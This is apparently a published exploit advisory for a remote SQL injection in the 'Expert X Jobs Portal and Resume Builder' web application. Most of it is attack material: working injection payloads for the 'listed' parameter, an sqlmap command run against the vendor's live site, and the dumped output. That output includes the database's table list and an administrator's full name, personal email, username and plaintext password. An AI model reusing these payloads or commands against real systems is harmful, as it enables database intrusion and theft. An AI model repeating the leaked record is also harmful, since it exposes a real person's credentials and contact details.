Expert X Jobs Portal and Resume Builder version 1.0 suffers from a remote SQL injection vulnerability.
376564ceda2e198de8dceb8ed5116a678ef9962cb5cead849c271870ad95168e
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr │ │ :
│ Website : wvidesk.com │ │ │
│ Vendor : WVIDesk │ │ │
│ Software : Expert X - Jobs Portal and │ │ Expert X can manage jobs, courses, │
│ Resume Builder v. 1.0 │ │ events and scholarships. │
│ Vuln Type: Remote SQL Injection │ │ │
│ Method : GET │ │ │
│ Impact : Database Access │ │ │
│ │ │ │
│────────────────────────────────────────────┘ └─────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost, Carlos132sp, ProGenius
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
GET parameter 'listed' is vulnerable.
---
Parameter: listed (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: listed=1' AND 6926=6926 AND 'ZFlv'='ZFlv
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: listed=1' AND (SELECT 6137 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(6137=6137,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NsfD'='NsfD
Type: time-based blind
Title: MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)
Payload: listed=1' OR 8793=BENCHMARK(5000000,MD5(0x6643566c))#
---
[+] Starting the Attack
sqlmap.py -u "http://expert.wvidesk.com/companies?listed=1" --current-db --batch --random-agent
[INFO] the back-end DBMS is MySQL
web application technology: PHP, Apache, PHP 5.6.40
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:03:36] [INFO] fetching current database
[23:03:36] [INFO] retrieved: 'livexzfv_jobdreamers'
current database: 'livexzfv_jobdreamers'
fetching tables for database: 'livexzfv_jobdreamers'
Database: livexzfv_jobdreamers
[56 tables]
+---------------------+
| adminMenu |
| applyajob |
| candidatefeedback |
| candidatelogin |
| candidateview |
| clickcount |
| controlall |
| controlcategory |
| coursecategory |
| courseinstitute |
| coursevisitsite |
| eventcategory |
| eventtype |
| jobagentcountry |
| jobalert |
| jobcategory |
| jobcity |
| jobcompanyinfo |
| jobcontinent |
| jobcountry |
| jobeducationsubject |
| jobindustry |
| jobmessage |
| jobpostingprice |
| jobquestion |
| jobseniority |
| jobuniversity |
| jobusermaster |
| jobusertype |
| jobvisitsite |
| mainmenu |
| postacourse |
| postaevent |
| postajob |
| postascholarship |
| resumeaward |
| resumecarsum |
| resumecertificate |
| resumecomment |
| resumeeducation |
| resumelanguage |
| resumeprofessional |
| resumepublication |
| resumeresearch |
| resumeskill |
| resumesumexp |
| resumetraining |
| resumework |
| scholarshipperiod |
| seeker_profile |
| seekers_admin |
| siteAdmin |
| siteadminuser |
| tbl_countries |
| tblpage |
| userrole |
+---------------------+
fetching columns for table 'siteadminuser' in database 'livexzfv_jobdreamers'
Database: livexzfv_jobdreamers
Table: siteadminuser
[8 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| aflag | varchar(2) |
| desig | varchar(200) |
| enet | varchar(450) |
| fullname | varchar(450) |
| id | int(10) |
| pw | varchar(25) |
| role | int(10) |
| users | varchar(200) |
+----------+--------------+
fetching entries of column(s) 'aflag,desig,enet,fullname,id,pw,role,users' for table 'siteadminuser' in database 'livexzfv_jobdreamers'
Database: livexzfv_jobdreamers
Table: siteadminuser
[1 entry]
+-------+------------+--------------------+------------------------+----+------+------+-------+
| aflag | desig | enet | fullname | id | pw | role | users |
+-------+------------+--------------------+------------------------+----+------+------+-------+
| Y | Site Admin | alam5664@gmail.com | Mohammad Alamgir Kabir | 1 | 5664 | 1 | Kabir |
+-------+------------+--------------------+------------------------+----+------+------+-------+
[-] Done